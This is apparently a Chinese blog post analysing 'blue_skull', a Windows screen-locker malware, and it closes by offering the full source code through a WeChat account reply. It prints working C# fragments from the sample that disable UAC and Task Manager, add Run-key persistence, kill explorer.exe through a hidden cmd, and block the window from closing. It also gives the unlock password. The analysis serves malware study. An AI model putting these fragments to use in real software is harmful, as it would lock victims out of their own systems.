blue_skull Windows勒索恶意软件分析

用户4682003

发布于 2025-06-16 01:13:47

9900

代码可运行

文章被收录于专栏：网络安全技术点滴分享网络安全技术点滴分享

运行总次数：0

代码可运行

系统功能分析

1. 系统概述

blue_skull是一个Windows平台的恶意锁定程序（Locker类型病毒），主要功能包括：

强制锁定用户系统
禁用任务管理器
修改关键注册表项
自启动持久化
播放背景音乐
需要输入特定密码才能解锁

2. 系统架构

3. 核心技术实现

3.1 注册表修改

// 禁用UAC
RegistryKey rg = Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
rg.SetValue("EnableLUA", 0, RegistryValueKind.DWord);
// 禁用任务管理器
RegistryKey fk = Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
fk.SetValue("DisableTaskMgr", 1, RegistryValueKind.DWord);
// 设置自启动
RegistryKey reg = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
reg.SetValue("blue_skull", Application.ExecutablePath.ToString());

3.2 进程控制

// 杀死explorer.exe
ProcessStartInfo kokot = new ProcessStartInfo();
kokot.FileName = "cmd.exe";
kokot.WindowStyle = ProcessWindowStyle.Hidden;
kokot.Arguments = @"/k taskkill /f /im explorer.exe";
Process.Start(kokot);
// 恢复explorer.exe
ProcessStartInfo kokot = new ProcessStartInfo();
kokot.FileName = "cmd.exe";
kokot.WindowStyle = ProcessWindowStyle.Hidden;
kokot.Arguments = @"/k start explorer.exe";

3.3 界面锁定

// 防止关闭
private void blue_skull2_FormClosing(object sender, FormClosingEventArgs e)
{
    e.Cancel = true; 
}
// 全屏透明窗口
this.TransparencyKey = this.BackColor;
this.Width = Screen.PrimaryScreen.Bounds.Width;
this.Height = Screen.PrimaryScreen.Bounds.Height;

3.4 网络功能

// 从GitHub下载音频文件
WebClient webClient = new WebClient();
webClient.DownloadFile("https://github.com/MalwareStudio/norm9/raw/master/norm9.wav", @"C:\norm9.wav");

4. 系统行为总结

启动阶段：
- 创建隐形全屏窗口
- 终止explorer.exe进程
- 修改关键注册表项
- 下载背景音乐文件
锁定阶段：
- 显示锁定界面
- 循环播放背景音乐
- 拦截所有关闭尝试
解锁阶段：
- 需要输入正确密码(672349276)
- 恢复注册表设置
- 重启explorer.exe
- 自我终止
需要源代码研究的同学可以在公众号回复“blueskull”下载即可，下载的源代码可以用于编译后做二进制病毒分析跟源代码进行对比学习。但不可用于做坏事，否则后果自负。这些源代码也可以用作AI分析的元数据，喂给AI吃，等代码量足够多了，即可实现一个deepseek或者其他AI病毒分析智能体（Agent）。